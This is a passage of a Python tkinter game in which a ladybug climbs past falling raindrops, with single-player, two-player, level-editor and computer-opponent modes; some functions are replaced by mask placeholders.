playerMousePressed(event, data)\n elif data.mode == '2Player':\n twoPlayerMousePressed(event, data)\n elif data.mode == 'editor':\n editorMousePressed(event, data)\n elif data.mode == 'levelCreated':\n levelCreatedMousePressed(event, data)\n elif data.mode == 'AI':\n AIMousePressed(event, data)\n elif data.mode == 'difficulty':\n difficultyMousePressed(event, data)\n elif data.mode == 'scoreboard':\n scoreboardMousePressed(event, data)\n elif data.mode == 'help':\n helpMousePressed(event, data)\n\n\n<mask token>\n\n\ndef timerFired(data):\n if data.mode == 'splashScreen':\n splashScreenTimerFired(data)\n elif data.mode == '1Player':\n playerTimerFired(data)\n elif data.mode == '2Player':\n twoPlayerTimerFired(data)\n elif data.mode == 'editor':\n editorTimerFired(data)\n elif data.mode == 'levelCreated':\n levelCreatedTimerFired(data)\n elif data.mode == 'AI':\n AITimerFired(data)\n elif data.mode == 'difficulty':\n difficultyTimerFired(data)\n elif data.mode == 'scoreboard':\n scoreboardTimerFired(data)\n elif data.mode == 'help':\n helpTimerFired(data)\n\n\ndef redrawAll(canvas, data):\n if data.mode == 'splashScreen':\n splashScreenRedrawAll(canvas, data)\n elif data.mode == '1Player':\n playerRedrawAll(canvas, data)\n elif data.mode == '2Player':\n twoPlayerRedrawAll(canvas, data)\n elif data.mode == 'editor':\n editorRedrawAll(canvas, data)\n elif data.mode == 'levelCreated':\n levelCreatedRedrawAll(canvas, data)\n elif data.mode == 'AI':\n AIRedrawAll(canvas, data)\n elif data.mode == 'difficulty':\n difficultyRedrawAll(canvas, data)\n elif data.mode == 'scoreboard':\n scoreboardRedrawAll(canvas, data)\n elif data.mode == 'help':\n helpRedrawAll(canvas, data)\n\n\n<mask token>\n\n\ndef splashKeyPressed(event, data):\n pass\n\n\ndef splashScreenTimerFired(data):\n data.splashScreenTime += 1\n if data.splashScreenTime % 2 == 1:\n rainDropSplash(data)\n for drop in data.splashScreenDrops:\n drop.onTimerFired(data)\n\n\ndef splashScreenButtons(canvas, data):\n canvas.create_image(data.splashButtonY, data.p1ButtonX, image=data.mode1)\n canvas.create_image(data.splashButtonY, data.p2ButtonX, image=data.mode2)\n canvas.create_image(data.splashButtonY, data.edButton, image=data.mode3)\n canvas.create_image(data.splashButtonY, data.diffButton, image=data.mode4)\n canvas.create_image(data.splashButtonY, data.helpButton, image=data.mode5)\n canvas.create_image(data.splashButtonY, data.sboardButton, image=data.mode6\n )\n\n\ndef rainDropSplash(data):\n xPosition = random.randint(0, 800)\n data.splashScreenDrops.append(Coconuts(xPosition, 0))\n\n\ndef splashScreenRedrawAll(canvas, data):\n canvas.create_image(data.width / 2, data.splashText - 10, image=data.title)\n for drop in data.splashScreenDrops:\n drop.draw(canvas)\n canvas.create_text(data.width / 2, data.splashText, text=\n \"\"\"\n 1.) Single Player Level Mode\n\n\n 2.) Two-Player Mode\n\n \n 3.) Level Creator Practice Mode\n\n \n 4.) Play Against the Computer\n\n \n 5.) Help and Instructions\n\n \n 6.) Scoreboard\n\n \n \"\"\"\n , font='Arial 14 bold', fill='yellow')\n splashScreenButtons(canvas, data)\n\n\ndef writeFile(path, contents):\n with open(path, 'wt') as f:\n f.write(contents)\n\n\ndef readFile(path):\n with open(path, 'rt') as f:\n return f.read()\n\n\nclass Coconuts(object):\n\n def __init__(self, x, y):\n self.x = x\n self.y = y\n self.r = 9\n self.fill = 'deep sky blue'\n self.speed = 30\n self.outline = 'blue'\n\n def draw(self, canvas):\n canvas.create_polygon(self.x, self.y - 2 * self.r, self.x - self.r,\n self.y, self.x, self.y + self.r, self.x + self.r, self.y, fill=\n self.fill, outline=self.outline, width=3)\n\n def onTimerFired(self, data):\n self.y += self.speed\n\n\ndef hit(data):\n for coconut in data.coconuts:\n if data.mode == '1Player' or data.mode == 'levelCreated':\n if coconut.y >= data.cy - data.r and coconut.y <= data.cy + data.r:\n if (coconut.x >= data.cx - data.r and coconut.x <= data.cx +\n data.r):\n data.cy += data.hitPenalty\n if data.mode == 'levelCreated':\n data.lives -= 1\n elif data.hit == False and data.level < data.levelMax:\n data.score -= data.level\n data.coconuts.remove(coconut)\n if data.mode == 'levelCreated':\n data.levelEditorLives -= 1\n\n\ndef hit2Player(data):\n if data.mode == '2Player':\n if data.Invincible1 == False:\n for coconut in data.coconuts1:\n if (coconut.y >= data.player1Y - data.r and coconut.y <= \n data.player1Y + data.r):\n if (coconut.x >= data.player1X - data.r and coconut.x <=\n data.player1X + data.r):\n data.player1Y += data.hitPenalty\n data.coconuts1.remove(coconut)\n if data.Invincible2 == False:\n for coconut in data.coconuts2:\n if (coconut.y >= data.player2Y - data.r and coconut.y <= \n data.player2Y + data.r):\n if (coconut.x >= data.player2X - data.r and coconut.x <=\n data.player2X + data.r):\n data.player2Y += data.hitPenalty\n data.coconuts2.remove(coconut)\n\n\nclass PowerUps(Coconuts):\n\n def __init__(self, x, y):\n super().__init__(x, y)\n\n def draw(self, canvas, data):\n canvas.create_image(self.x, self.y, image=data.hourGlass)\n\n\ndef hitPause(data):\n for powerUp in data.powerUps:\n if data.mode == '1Player' or data.mode == 'levelCreated':\n if powerUp.y >= data.cy - data.r and powerUp.y <= data.cy + data.r:\n if (powerUp.x >= data.cx - data.r and powerUp.x <= data.cx +\n data.r):\n data.pauseDrops = True\n data.start = data.cy\n data.powerUps.remove(powerUp)\n elif data.mode == '2Player' or data.mode == 'AI':\n if (powerUp.y >= data.player1Y - data.r and powerUp.y <= data.\n player1Y + data.r):\n if (powerUp.x >= data.player1X - data.r and powerUp.x <= \n data.player1X + data.r):\n data.pause1Drop = True\n data.start1 = data.player1Y\n data.powerUps.remove(powerUp)\n if (powerUp.y >= data.player2Y - data.r and powerUp.y <= data.\n player2Y + data.r):\n if (powerUp.x >= data.player2X - data.r and powerUp.x <= \n data.player2X + data.r):\n data.pause2Drop = True\n data.start2 = data.player2Y\n data.powerUps.remove(powerUp)\n\n\nclass Invincible(PowerUps):\n\n def __init__(self, x, y):\n super().__init__(x, y)\n\n def draw(self, canvas, data):\n canvas.create_image(self.x, self.y, image=data.umbrella)\n\n\ndef hitInvincible(data):\n for powerUp in data.invincible:\n if data.mode == '1Player' or data.mode == 'levelCreated':\n if powerUp.y >= data.cy - data.r and powerUp.y <= data.cy + data.r:\n if (powerUp.x >= data.cx - data.r and powerUp.x <= data.cx +\n data.r):\n data.beInvincible = True\n data.start = data.cy\n data.invincible.remove(powerUp)\n if data.mode == '2Player' or data.mode == 'AI':\n if (powerUp.y >= data.player1Y - data.r and powerUp.y <= data.\n player1Y + data.r):\n if (powerUp.x >= data.player1X - data.r and powerUp.x <= \n data.player1X + data.r):\n data.Invincible1 = True\n data.start1 = data.player1Y\n data.invincible.remove(powerUp)\n if (powerUp.y >= data.player2Y - data.r and powerUp.y <= data.\n player2Y + data.r):\n if (powerUp.x >= data.player2X - data.r and powerUp.x <= \n data.player2X + data.r):\n data.Invincible2 = True\n data.start2 = data.player2Y\n data.invincible.remove(powerUp)\n\n\nclass ScaryBug(object):\n\n def __init__(self, x, y):\n self.x = x\n self.y = y\n self.speed = 25\n\n def draw(self, canvas, data):\n canvas.create_image(self.x, self.y, image=data.spider)\n\n def onTimerFired(self, data):\n if data.mode == '2Player' or data.mode == 'AI':\n self.speed = 35\n self.y -= self.speed\n if (data.mode == '1Player' or data.mode == 'levelCreated' and data.\n time % 8 == 0):\n side = random.choice(data.sides)\n if side == 'l':\n if self.x - data.lane >= data.Player1Min:\n self.x -= data.lane\n else:\n self.x += data.lane\n elif side == 'r':\n if self.x + data.lane <= data.Player1Max:\n self.x += data.lane\n else:\n self.x -= data.lane\n\n\ndef hitScaryBug(data):\n for bug in data.scaryBug:\n if data.mode == '1Player' or data.mode == 'levelCreated':\n if (bug.y >= data.cy - 1.5 * data.r and bug.y <= data.cy + 1.5 *\n data.r):\n if (bug.x >= data.cx - 1.5 * data.r and bug.x <= data.cx + \n 1.5 * data.r):\n data.hit = True\n data.lives = 0\n data.levelEditorLives = 0\n if data.mode == '2Player' or data.mode == 'AI':\n if (bug.y >= data.player1Y - data.r and bug.y <= data.player1Y +\n data.r):\n if (bug.x >= data.player1X - data.r and bug.x <= data.\n player1X + data.r):\n data.winner = 'player2'\n if (bug.y >= data.player2Y - data.r and bug.y <= data.player2Y +\n data.r):\n if (bug.x >= data.player2X - data.r and bug.x <= data.\n player2X + data.r):\n data.winner = 'player1'\n\n\ndef drawPowerups(canvas, data):\n for bug in data.scaryBug:\n bug.draw(canvas, data)\n for powerUp in data.powerUps:\n powerUp.draw(canvas, data)\n for powerUp in data.invincible:\n powerUp.draw(canvas, data)\n\n\ndef drawHome(canvas, data):\n canvas.create_image(data.homeX, data.homeY, image=data.home)\n\n\n<mask token>\n\n\ndef powerUpCoconutShot(data):\n if data.time % 60 == 0 and data.time % 120 != 0:\n Position = random.choice(data.spotList)\n data.powerUps.append(PowerUps(Position, 0))\n if data.time % 50 == 0:\n Position = random.choice(data.spotList)\n data.invincible.append(Invincible(Position, 0))\n if data.time % 100 == 0:\n Position = random.choice(data.spotList)\n data.scaryBug.append(ScaryBug(Position, 750))\n\n\n<mask token>\n\n\ndef playerRedrawAll(canvas, data):\n canvas.create_image(data.width / 2, data.height / 2, image=data.background)\n canvas.create_line(0, 20, data.width, 20)\n for coconut in data.coconuts:\n coconut.draw(canvas)\n drawPowerups(canvas, data)\n canvas.create_image(data.cx, data.cy, image=data.ladyBug)\n canvas.create_text(data.width / 6, 50, text='Level: %d' % data.level,\n font='Arial 18 bold', fill='yellow')\n canvas.create_text(data.width / 6, 80, text='Score: %d' % data.score,\n font='Arial 18 bold', fill='yellow')\n canvas.create_text(2 * data.width / 3, 660, text=\n \"\"\"The greater the level, the more points get\n added to your score!\"\"\"\n , font='Arial 15 bold', fill='yellow')\n if data.hit == True:\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n deadScreen)\n canvas.create_text(data.width / 2, data.height / 4, text=\n 'You Lose! Better Luck Next Time!', font='Helvetica 23 bold',\n fill='yellow')\n canvas.create_text(data.width / 2, 280, text='Score: %d' % data.\n score, font='Arial 13 bold', fill='yellow')\n if data.level >= 8:\n madeIt(canvas, data)\n drawHome(canvas, data)\n\n\ndef madeIt(canvas, data):\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 70, text='You Made it!', font=\n 'Arial 23 bold', fill='yellow')\n canvas.create_text(data.width / 2, 100, text='Score: %d' % data.score,\n font='Arial 15 bold', fill='yellow')\n canvas.create_text(data.width / 2, 375, text=\n 'Congrats! Enter your Name!', font='Arial 15 bold', fill='yellow')\n canvas.create_rectangle(data.width / 2 - 50, 400, data.width / 2 + 50, \n 450, fill='white')\n canvas.create_text(data.width / 2, 425, text=data.name)\n\n\ndef drop2Player(data):\n if data.winner == None and data.pauseDrops == False:\n if data.time % 15 == 0:\n xPosition1 = random.randint(0, 385)\n if abs(xPosition1 - 100) > 25 and abs(xPosition1 - 360) > 25:\n if data.pause1Drop != True:\n data.coconuts1.append(Coconuts(xPosition1, 0))\n if data.pause2Drop != True:\n data.coconuts2.append(Coconuts(xPosition1 + 410, 0))\n if data.time % 12 == 0:\n side = random.choice(data.sides)\n if side == 'l':\n if data.pause1Drop != True:\n data.coconuts1.append(Coconuts(140, 0))\n if data.pause2Drop != True:\n data.coconuts2.append(Coconuts(540, 0))\n elif side == 'r':\n if data.pause1Drop != True:\n data.coconuts1.append(Coconuts(344, 0))\n if data.pause2Drop != True:\n data.coconuts2.append(Coconuts(755, 0))\n powerupDrop2Player(data)\n\n\ndef powerupDrop2Player(data):\n if data.time % 45 == 0 and data.time % 90 != 0:\n side = random.choice(data.sides)\n if side == 'l':\n if data.pause1Drop != True:\n data.powerUps.append(PowerUps(140, 0))\n if data.pause2Drop != True:\n data.powerUps.append(PowerUps(540, 0))\n elif side == 'r':\n if data.pause1Drop != True:\n data.powerUps.append(PowerUps(344, 0))\n if data.pause2Drop != True:\n data.powerUps.append(PowerUps(755, 0))\n if data.time % 60 == 0:\n side = random.choice(data.sides)\n if side == 'l':\n if data.pause1Drop != True:\n data.invincible.append(Invincible(140, 0))\n if data.pause2Drop != True:\n data.invincible.append(Invincible(540, 0))\n elif side == 'r':\n if data.pause1Drop != True:\n data.invincible.append(Invincible(344, 0))\n if data.pause2Drop != True:\n data.invincible.append(Invincible(755, 0))\n if data.time % 90 == 0:\n side = random.choice(data.sides)\n if side == 'l':\n data.scaryBug.append(ScaryBug(140, 750))\n data.scaryBug.append(ScaryBug(540, 750))\n elif side == 'r':\n data.scaryBug.append(ScaryBug(344, 750))\n data.scaryBug.append(ScaryBug(755, 750))\n\n\ndef twoPlayerKeyPressed(event, data):\n if event.keysym == 'r':\n init(data)\n if data.winner == None:\n if event.keysym == 'a' and data.onLeft1 == False:\n data.onLeft1 = True\n data.player1X = 150\n if event.keysym == 'd' and data.onLeft1 == True:\n data.onLeft1 = False\n data.player1X = 330\n if event.keysym == 'Left' and data.onLeft2 == False:\n data.onLeft2 = True\n data.player2X = 550\n if event.keysym == 'Right' and data.onLeft2 == True:\n data.onLeft2 = False\n data.player2X = 750\n\n\ndef twoPlayerMousePressed(event, data):\n checkHome(event, data)\n\n\ndef twoPlayerTimerFired(data):\n if data.winner == None:\n data.player1Y -= data.speed\n if data.player1Y < 15 and data.player2Y > 15:\n data.winner = 'player1'\n if data.player1Y > 40:\n data.time += 1\n drop2Player(data)\n data.player2Y -= data.speed\n if data.player2Y < 15 and data.player1Y > 15:\n data.winner = 'player2'\n if data.player2Y > 40:\n data.time += 1\n drop2Player(data)\n if data.player1Y < 15 and data.player2Y < 15:\n data.winner = 'tie'\n for powerUp in data.powerUps:\n powerUp.onTimerFired(data)\n hitPause(data)\n for powerUp in data.invincible:\n powerUp.onTimerFired(data)\n hitInvincible(data)\n for bug in data.scaryBug:\n bug.onTimerFired(data)\n hitScaryBug(data)\n powerupTimerFired(data)\n\n\ndef powerupTimerFired(data):\n for coconut in data.coconuts1:\n if data.pause1Drop == False:\n coconut.onTimerFired(data)\n hit2Player(data)\n for coconut in data.coconuts2:\n if data.pause2Drop == False:\n coconut.onTimerFired(data)\n if data.start1 != None:\n if abs(data.start1 - data.player1Y) >= 120:\n data.pause1Drop = False\n data.Invincible1 = False\n if data.start2 != None:\n if abs(data.start2 - data.player2Y) >= 120:\n data.pause2Drop = False\n data.Invincible2 = False\n\n\ndef twoPlayerRedrawAll(canvas, data):\n canvas.create_image(data.width / 4, data.height / 2, image=data.\n halfBackground)\n canvas.create_image(3 * data.width / 4, data.height / 2, image=data.\n halfBackground)\n canvas.create_line(data.width / 2, 0, data.width / 2, data.height, width=10\n )\n canvas.create_line(0, 20, data.width, 20)\n for coconut in data.coconuts1:\n coconut.draw(canvas)\n for coconut in data.coconuts2:\n coconut.draw(canvas)\n drawPowerups(canvas, data)\n canvas.create_image(data.player1X, data.player1Y, image=data.ladyBug)\n canvas.create_image(data.player2X, data.player2Y, image=data.ladyBug)\n canvas.create_text(50, 40, text='Player 1', font='Arial 15 bold', fill=\n 'yellow')\n canvas.create_text(450, 40, text='Player 2', font='Arial 15 bold', fill\n ='yellow')\n winner(canvas, data)\n drawHome(canvas, data)\n\n\ndef winner(canvas, data):\n if data.winner == 'player1':\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text=\n 'You Made it! Player 1', font='Arial 23 bold', fill='yellow')\n elif data.winner == 'player2':\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text=\n 'You Made it! Player 2', font='Arial 23 bold', fill='yellow')\n elif data.winner == 'tie':\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text=\n 'Tie! You Both Made it!', font='Arial 23 bold', fill='yellow')\n\n\ndef editorKeyPressed(event, data):\n if event.keysym == 'r':\n init(data)\n\n\ndef editorMousePressed(event, data):\n checkHome(event, data)\n if data.easyY - data.r <= event.y <= data.easyY + data.r:\n if data.easyX - 2 * data.r <= event.x <= data.easyX + 2 * data.r:\n data.yourSpeed = 'slow'\n data.slow = data.click\n data.medium, data.fast = data.notClick, data.notClick\n if data.medX - 2 * data.r <= event.x <= data.medX + 2 * data.r:\n data.yourSpeed = 'medium'\n data.medium = data.click\n data.slow, data.fast = data.notClick, data.notClick\n if data.hardX - 2 * data.r <= event.x <= data.hardX + 2 * data.r:\n data.yourSpeed = 'fast'\n data.fast = data.click\n data.slow, data.medium = data.notClick, data.notClick\n checkMiddle(event, data)\n checkLast(event, data)\n\n\ndef checkMiddle(event, data):\n if data.medX - data.r <= event.y <= data.medX + data.r:\n if data.easyX - 2 * data.r <= event.x <= data.easyX + 2 * data.r:\n data.rainSpeed = 'drizzle'\n data.drizzle = data.click\n data.rain, data.thunderstorm = data.notClick, data.notClick\n if data.medX - 2 * data.r <= event.x <= data.medX + 2 * data.r:\n data.rainSpeed = 'rain'\n data.rain = data.click\n data.drizzle, data.thunderstorm = data.notClick, data.notClick\n if data.hardX - 2 * data.r <= event.x <= data.hardX + 2 * data.r:\n data.rainSpeed = 'thunderstorm'\n data.thunderstorm = data.click\n data.drizzle, data.rain = data.notClick, data.notClick\n\n\n<mask token>\n\n\ndef drawButtons(canvas, data):\n data.font, data.fill = 'Helvetica 13 bold', 'yellow'\n canvas.create_text(data.medX, data.YST, text='Your Speed:', font=data.\n font, fill=data.fill)\n canvas.create_image(data.easyX, data.easyY, image=data.slow)\n canvas.create_text(data.easyX, data.easyY, text='Slow', font=data.font)\n canvas.create_image(data.medX, data.easyY, image=data.medium)\n canvas.create_text(data.medX, data.easyY, text='Medium', font=data.font)\n canvas.create_image(data.hardX, data.easyY, image=data.fast)\n canvas.create_text(data.hardX, data.easyY, text='Fast', font=data.font)\n canvas.create_image(data.easyX, data.medX, image=data.drizzle)\n canvas.create_text(data.medX, data.RST, text='Rain Speed:', font=data.\n font, fill=data.fill)\n canvas.create_text(data.easyX, data.medX, text='Drizzle', font=data.font)\n canvas.create_image(data.medX, data.medX, image=data.rain)\n canvas.create_text(data.medX, data.medX, text='Rain', font=data.font)\n canvas.create_image(data.hardX, data.medX, image=data.thunderstorm)\n canvas.create_text(data.hardX, data.medX, text='Heavy', font=data.font)\n canvas.create_text(data.medX, data.PUT, text='PowerUps?', font=data.\n font, fill=data.fill)\n canvas.create_image(data.easyY, data.last, image=data.yes)\n canvas.create_text(data.easyY, data.last, text='Yes', font=data.font)\n canvas.create_image(data.last, data.last, image=data.no)\n canvas.create_text(data.last, data.last, text='No', font=data.font)\n changeEnter(canvas, data)\n\n\ndef changeEnter(canvas, data):\n if (data.powerUpsEditor != None and data.yourSpeed != None and data.\n rainSpeed != None):\n data.enter = data.click\n canvas.create_image(data.medX, data.enterX, image=data.enter)\n canvas.create_text(data.medX, data.enterX, text='Enter', font=data.font)\n\n\ndef editorTimerFired(data):\n data.editorTime += 1\n if data.editorTime % 2 == 0:\n rainDrop(data)\n for drop in data.editorDrops:\n drop.onTimerFired(data)\n\n\ndef rainDrop(data):\n xPosition = random.randint(0, data.width)\n data.editorDrops.append(Coconuts(xPosition, 0))\n\n\ndef editorRedrawAll(canvas, data):\n canvas.create_image(data.width / 2, data.height / 2, image=data.background)\n canvas.create_image(data.width / 2, data.height / 2, image=data.tbg)\n for drop in data.editorDrops:\n drop.draw(canvas)\n canvas.create_text(data.width / 2, data.S_P - 10, text=\n 'Edit Your Level!', font='Arial 23 bold', fill='yellow')\n drawButtons(canvas, data)\n drawHome(canvas, data)\n\n\ndef setEverything(data):\n if data.yourSpeed == 'slow':\n data.speed = 6\n elif data.yourSpeed == 'medium':\n data.speed = 10\n elif data.yourSpeed == 'fast':\n data.speed = 14\n if data.rainSpeed == 'thunderstorm':\n data.rSpeed = 7\n elif data.rainSpeed == 'rain':\n data.rSpeed = 10\n elif data.rainSpeed == 'drizzle':\n data.rSpeed = 13\n\n\n<mask token>\n\n\ndef levelPowerUp(data):\n if data.powerUpsEditor == True:\n if data.time % 20 == 0 and data.time % 40 != 0:\n Position = random.choice(data.spotList)\n data.powerUps.append(PowerUps(Position, 0))\n if data.time % 30 == 0:\n Position = random.choice(data.spotList)\n data.invincible.append(Invincible(Position, 0))\n if data.time % 35 == 0:\n Position = random.choice(data.spotList)\n data.scaryBug.append(ScaryBug(Position, 750))\n\n\n<mask token>\n\n\ndef levelCreatedMousePressed(event, data):\n checkHome(event, data)\n\n\ndef levelCreatedTimerFired(data):\n setEverything(data)\n if data.levelEditorLives > 0:\n data.cy -= data.speed\n if data.cy < 15:\n data.level += 1\n if data.cy > 40:\n data.time += 1\n if data.pauseDrops != True:\n levelCoconutShot(data)\n if data.powerUpsEditor == False:\n for coconut in data.coconuts:\n coconut.onTimerFired(data)\n hit(data)\n if data.powerUpsEditor == True:\n for powerUp in data.powerUps:\n powerUp.onTimerFired(data)\n hitPause(data)\n for powerUp in data.invincible:\n powerUp.onTimerFired(data)\n hitInvincible(data)\n for bug in data.scaryBug:\n bug.onTimerFired(data)\n hitScaryBug(data)\n for coconut in data.coconuts:\n if data.pauseDrops == False:\n coconut.onTimerFired(data)\n if data.beInvincible == False:\n hit(data)\n if data.start != None:\n if abs(data.start - data.cy) >= 120:\n data.pauseDrops, data.beInvincible = False, False\n\n\ndef levelCreatedRedrawAll(canvas, data):\n canvas.create_image(data.width / 2, data.height / 2, image=data.background)\n canvas.create_line(0, 20, data.width, 20)\n for coconut in data.coconuts:\n coconut.draw(canvas)\n if data.powerUpsEditor == True:\n drawPowerups(canvas, data)\n canvas.create_image(data.cx, data.cy, image=data.ladyBug)\n canvas.create_text(data.width / 6, 100, text='Total Lives: %d' % data.\n levelEditorLives, font='Arial 20 bold', fill='yellow')\n canvas.create_text(data.width / 2, 660, text=\n \"\"\"You lose a life for hitting a drop\n & don't get eaten!\"\"\",\n font='Arial 15 bold', fill='yellow')\n if data.levelEditorLives <= 0:\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n deadScreen)\n canvas.create_text(data.width / 2, data.height / 4, text=\n 'You Lose! Better Luck Next Time!', font='Helvetica 23 bold',\n fill='yellow')\n if data.level > 1:\n winEditor(canvas, data)\n drawHome(canvas, data)\n\n\ndef winEditor(canvas, data):\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text='You Made it!', font=\n 'Arial 23 bold', fill='yellow')\n\n\n<mask token>\n\n\ndef difficultyMousePressed(event, data):\n checkHome(event, data)\n if data.easyY - data.r <= event.y <= data.easyY + data.r:\n if data.easyX - 2 * data.r <= event.x <= data.easyX + 2 * data.r:\n data.difficulty = data.difS\n data.slow = data.click\n data.medium, data.fast = data.notClick, data.notClick\n if data.medX - 2 * data.r <= event.x <= data.medX + 2 * data.r:\n data.difficulty = data.difM\n data.medium = data.click\n data.slow, data.fast = data.notClick, data.notClick\n if data.hardX - 2 * data.r <= event.x <= data.hardX + 2 * data.r:\n data.difficulty = data.difH\n data.fast = data.click\n data.slow, data.medium = data.notClick, data.notClick\n if data.enter == data.click:\n if data.enterY - data.r <= event.y <= data.enterY + data.r:\n if data.medX - 2 * data.r <= event.x <= data.medX + 2 * data.r:\n data.mode = 'AI'\n\n\ndef difficultyTimerFired(data):\n data.editorTime += 1\n if data.editorTime % 2 == 0:\n rainDrop(data)\n for drop in data.editorDrops:\n drop.onTimerFired(data)\n\n\ndef rainDrop(data):\n xPosition = random.randint(0, data.width)\n data.editorDrops.append(Coconuts(xPosition, 0))\n\n\ndef difficultyRedrawAll(canvas, data):\n canvas.create_image(data.width / 2, data.height / 2, image=data.background)\n canvas.create_image(data.width / 2, data.height / 2, image=data.tbg)\n for drop in data.editorDrops:\n drop.draw(canvas)\n drawDifficulties(canvas, data)\n drawHome(canvas, data)\n\n\ndef hitAI1(data, distance):\n for coconut in data.coconutsAI1:\n if (data.player1Y - data.r - coconut.y <= distance and data.\n switchOnProgress == False):\n if (coconut.x >= data.player1X - data.r and coconut.x <= data.\n player1X + data.r or AISwitchBug(data, distance) == True):\n testInt = random.randint(0, 9)\n if testInt <= data.difficulty:\n data.switchOnProgress = True\n if data.player1X == 150:\n data.player1X = 340\n else:\n data.player1X = 150\n data.switchOnProgress = False\n if (coconut.y >= data.player1Y - data.r and coconut.y <= data.\n player1Y + data.r):\n if (coconut.x >= data.player1X - data.r and coconut.x <= data.\n player1X + data.r):\n data.player1Y += 50\n data.coconutsAI1.remove(coconut)\n\n\ndef AISwitchBug(data, distance):\n for scaryBug in data.scaryBug:\n if (data.player1Y - data.r - scaryBug.y <= distance and data.\n switchOnProgress == False):\n if (scaryBug.x >= data.player1X - data.r and scaryBug.x <= data\n .player1X + data.r):\n return True\n\n\ndef hitAI2(data, distance):\n for coconut in data.coconutsAI2:\n if (coconut.y >= data.player2Y - data.r and coconut.y <= data.\n player2Y + data.r):\n if (coconut.x >= data.player2X - data.r and coconut.x <= data.\n player2X + data.r):\n data.player2Y += 50\n data.coconutsAI2.remove(coconut)\n\n\ndef coconutShotAI(data):\n if data.winner == None:\n if data.time % 15 == 0:\n xPosition1 = random.randint(0, 385)\n if abs(xPosition1 - 100) > 40 and abs(xPosition1 - 360) > 40:\n if data.pause1Drop != True:\n data.coconutsAI1.append(Coconuts(xPosition1, 0))\n if data.pause2Drop != True:\n data.coconutsAI2.append(Coconuts(xPosition1 + 410, 0))\n if data.time % 8 == 0:\n xPosition2 = random.randint(0, 80)\n xPosition3 = random.randint(364, 385)\n if data.pause1Drop != True:\n data.coconutsAI1.append(Coconuts(xPosition2, 0))\n data.coconutsAI1.append(Coconuts(xPosition3, 0))\n if data.pause2Drop != True:\n data.coconutsAI2.append(Coconuts(xPosition2 + 410, 0))\n data.coconutsAI2.append(Coconuts(xPosition3 + 410, 0))\n addExtraCoconut(data)\n addPowerUpsAI(data)\n\n\n<mask token>\n\n\ndef addPowerUpsAI(data):\n if data.time % 33 == 0:\n side = random.choice(data.sides)\n if side == 'l':\n if data.pause1Drop != True:\n data.invincible.append(Invincible(140, 0))\n if data.pause2Drop != True:\n data.invincible.append(Invincible(550, 0))\n elif side == 'r':\n if data.pause1Drop != True:\n data.invincible.append(Invincible(344, 0))\n if data.pause2Drop != True:\n data.invincible.append(Invincible(755, 0))\n if data.time % 66 == 0:\n side = random.choice(data.sides)\n if side == 'l':\n data.scaryBug.append(ScaryBug(140, 750))\n data.scaryBug.append(ScaryBug(550, 750))\n elif side == 'r':\n data.scaryBug.append(ScaryBug(344, 750))\n data.scaryBug.append(ScaryBug(750, 750))\n\n\n<mask token>\n\n\ndef AITimerFired(data):\n if data.winner == None:\n if data.Invincible1 == False:\n hitAI1(data, 31)\n if data.Invincible2 == True:\n pass\n elif data.Invincible2 == False:\n hitAI2(data, 31)\n for coconut in data.coconutsAI1:\n if data.pause1Drop == False:\n coconut.onTimerFired(data)\n for coconut in data.coconutsAI2:\n if data.pause2Drop == False:\n coconut.onTimerFired(data)\n if data.Invincible1 == False:\n hitAI1(data, 13)\n if data.Invincible2 == True:\n pass\n elif data.Invincible2 == False:\n hitAI2(data, 13)\n data.player1Y -= data.speedAI\n if data.player1Y < 15 and data.player2Y > 15:\n data.winner = 'player1'\n if data.player1Y > 40:\n data.time += 1\n coconutShotAI(data)\n data.player2Y -= data.speedAI\n if data.player2Y < 15 and data.player1Y > 15:\n data.winner = 'player2'\n if data.player2Y > 40:\n data.time += 1\n coconutShotAI(data)\n if data.player1Y < 15 and data.player2Y < 15:\n data.winner = 'tie'\n for powerUp in data.powerUps:\n powerUp.onTimerFired(data)\n hitPause(data)\n powerUpAITimerFired(data)\n\n\ndef powerUpAITimerFired(data):\n for powerUp in data.invincible:\n powerUp.onTimerFired(data)\n hitInvincible(data)\n for bug in data.scaryBug:\n bug.onTimerFired(data)\n hitScaryBug(data)\n if data.start1 != None:\n if abs(data.start1 - data.player1Y) >= 120:\n data.pause1Drop = False\n data.Invincible1 = False\n if data.start2 != None:\n if abs(data.start2 - data.player2Y) >= 120:\n data.pause2Drop = False\n data.Invincible2 = False\n\n\ndef AIRedrawAll(canvas, data):\n canvas.create_image(data.width / 4, data.height / 2, image=data.\n halfBackground)\n canvas.create_image(3 * data.width / 4, data.height / 2, image=data.\n halfBackground)\n canvas.create_line(data.width / 2, 0, data.width / 2, data.height, width=10\n )\n canvas.create_line(0, 20, data.width, 20)\n for coconut in data.coconutsAI1:\n coconut.draw(canvas)\n for coconut in data.coconutsAI2:\n coconut.draw(canvas)\n canvas.create_text(50, 40, text='Computer', font='Arial 15 bold', fill=\n 'yellow')\n canvas.create_text(450, 40, text='Player 1', font='Arial 15 bold', fill\n ='yellow')\n drawPowerups(canvas, data)\n canvas.create_image(data.player1X, data.player1Y, image=data.ladyBug)\n canvas.create_image(data.player2X, data.player2Y, image=data.ladyBug)\n AIWinner(canvas, data)\n drawHome(canvas, data)\n\n\ndef AIWinner(canvas, data):\n if data.winner == 'player1':\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n 